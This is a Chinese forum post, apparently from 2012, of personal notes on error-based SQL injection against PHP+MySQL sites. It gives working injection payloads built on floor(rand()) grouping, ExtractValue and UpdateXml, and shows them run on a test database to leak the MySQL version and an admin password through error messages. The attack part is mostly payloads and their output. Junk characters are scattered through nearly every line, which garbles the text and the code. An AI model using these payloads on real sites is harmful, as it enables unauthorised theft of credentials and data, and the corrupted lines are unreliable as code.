放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。' b% R- C4 R7 I% W
实际测试环境:
- w/ w6 h9 f9 D9 c4 w) p4 v$ b) p& E4 E; D5 ~" D
0 m( L% z9 r1 g6 v, u
mysql> show tables;
/ ?$ s; L) u: _2 e2 k+ m+----------------+# G6 \* X; M# M8 f) D- k( m
| Tables_in_test |( b# Z2 I U8 p2 ^# M, `" v
+----------------+1 ] h; W8 z k: G% m. m- R* p
| admin |* Y5 c6 j+ T6 ^, U
| article |
9 G* D0 Z' O6 o$ \+----------------+" n0 F& u; c+ ]) a' S E6 }3 [
4 C# q$ ~- z8 w7 I: A 9 O. O3 [' p2 U' O6 m9 J
4 c8 j8 @- g6 T3 a) d5 u
mysql> describe admin;
Y7 d% {, E% ^, I+-------+------------------+------+-----+---------+----------------+
5 x4 J, A8 a5 X$ v| Field | Type | Null | Key | Default | Extra |
- M' Z' P+ r, l' F+-------+------------------+------+-----+---------+----------------+
9 J3 j c/ u" K, Q$ ^, I" f% l5 y1 K# || id | int(10) unsigned | NO | PRI | NULL | auto_increment |
; o. X) Q t; d! f+ F| user | varchar(50) | NO | | NULL | |4 X6 x _5 v$ E0 }
| pass | varchar(50) | NO | | NULL | |' y% l% Q/ { Y: R9 w
+-------+------------------+------+-----+---------+----------------+" I; ~- U9 R7 Y7 O% c5 g2 k
# [5 q1 B! _4 p# B3 _8 P& x( a# C
1 C" x, J B, o- |/ B0 R8 I) O
4 ]) s: a3 V* M- H% ~: x- }mysql> describe article;
% a' R! J( q" v5 u+---------+------------------+------+-----+---------+----------------+
6 k2 }, F( Q) `/ f4 c) X1 B| Field | Type | Null | Key | Default | Extra |
/ y" H. y2 w, [, h* v- |+---------+------------------+------+-----+---------+----------------+* Q; m3 A" @* y, K
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |) o( N! W2 K! h! j
| title | varchar(50) | NO | | NULL | |; J+ @) H2 I o M0 }! k' |
| content | varchar(50) | NO | | NULL | |
* M: }- k/ E; v! n. l/ h- J+---------+------------------+------+-----+---------+----------------+- w8 ~: i5 }! w, w9 [( N
1、通过floor报错
. C" D- x" h* s& @! L0 H, i+ m可以通过如下一些利用代码
4 v7 n; V2 ^- ~7 \- Z0 j ' M x/ { P" I7 }. R3 @
+ T9 B' b5 ]. ~: k! P' G! e
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x& A$ v6 o# u5 J# C: T1 _
from information_schema.tables group by x)a);9 q/ l$ b# U6 c" a# D) h
6 v+ R# |6 L9 I
7 J5 R8 C ]+ {' [; t6 T
and (select count(*) from (select 1 union select null union select !1)x
+ j$ K. `9 f1 u) E, n$ Lgroup by concat((select table_name from information_schema.tables limit 1),( L0 z' B, t" y* j8 }
floor(rand(0)*2)));% H. @5 z6 G, J" J. E: r2 H0 i8 L
举例如下: D# V& ~0 G3 @% f4 E4 n: b7 I
首先进行正常查询: f8 {# i. N5 `( h) T5 P- Y
/ W, B- M8 |, K. O4 \2 ]
mysql> select * from article where id = 1;5 X4 I$ S$ k: C, [& w
+----+-------+---------+
: p! X ?. p! X3 R| id | title | content |
' L: [0 r0 i+ Z0 f/ ?+----+-------+---------+( R8 z5 u. R, {( v# ~' I. d
| 1 | test | do it |. ^; d+ p, Y( d" }
+----+-------+---------+
4 t7 E) d* h' W/ c假如id输入存在注入的话,可以通过如下语句进行报错。+ l7 \. Z/ j8 `& ^& v% N/ `' Z; _, o
o& X5 Z9 O4 V4 O
@! X: U. M4 d$ b, nmysql> select * from article where id = 1 and (select 1 from
& t) \1 A* g& B- w3 i& J+ e( X% y(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
% J! Y5 V' R+ U/ v( v; KERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'+ B6 ^7 C9 W5 C) I4 g
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。0 i7 t5 s$ S8 G3 ?3 h3 B! F' Z% B
例如我们需要查询管理员用户名和密码:, L3 w+ Q; C6 n+ T
Method1:1 I( r) l: u, y4 z& w. T
. l6 X$ K8 i* m c5 t
" r& G4 A8 \2 h. N2 `) ~
mysql> select * from article where id = 1 and (select 1 from9 T2 j: y/ j5 H7 ?
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
1 j& {$ f8 K; }# O4 a0 z4 xfrom information_schema.tables group by x)a);
' |- @% @+ k! x2 c: X0 X2 R7 |ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
8 }$ ^( I6 S9 {8 E1 M$ i% U( QMethod2:! C2 F8 O9 k3 ?3 O
: J/ I/ u& m1 n1 x* w s$ J / K @) P: Q1 Q$ o% A" f6 @, m+ H
mysql> select * from article where id = 1 and (select count(*)
3 A) C; _! `( z. z0 ^from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),7 m; y% d1 F4 d- D
floor(rand(0)*2)));: N7 l1 `" \: z! k- o. j
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
) r1 ~2 k9 ~ P' ~9 m. R2、ExtractValue
& p0 @* X$ D/ D! c; @) | A3 W" i测试语句如下" g* r" Z6 ?0 s1 j* J8 Q
* q8 Y1 X- b" Z6 d4 |
' o2 }" E1 s" A1 Land extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));1 [+ ^; f: I2 C2 u! j2 k9 ^
实际测试过程+ ?0 E6 C/ C+ a. F8 P, e- }" _5 l8 q
8 W+ O z8 `. F# \6 O7 s% r! n! X
' N2 o2 J8 i6 P+ Smysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
$ P% C7 G$ Y' Q. X/ S# H(select pass from admin limit 1)));--( @0 O7 i! L8 Y' O& d) f4 v
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
: N/ ?5 d" e3 i( L0 M$ c7 X/ v3、UpdateXml
) f- e; F2 C) X1 Z6 e/ A# M测试语句5 {; q* ]9 T) f3 p
* l2 d% F! ] B- b# V
, u2 i% Z+ H+ q3 K! ]: m4 [, i
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
* V" V' O2 c( X; Y; |% o实际测试过程7 B. y$ A7 K- W# u. }1 @
@& j* x- c) }7 r" N ( B6 h3 c9 o2 t( J) n+ S0 ?
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
5 C( F% Y; H* Z5 G, N9 ^' Y( O* V(select pass from admin limit 1),0x5e24),1));
7 ?! Y0 A# f- @/ W! b* A! ?( TERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
% T- X6 \8 n: H# ?0 gAll, thanks foreign guys.8 r, R0 a6 Z4 J& z, `7 N* q: {( M
+ ] @3 m ?8 \. X- z* q
% M% i' F3 v% u! |( Z3 w |
发表于 2012-12-10 10:28:51
收藏
支持
反对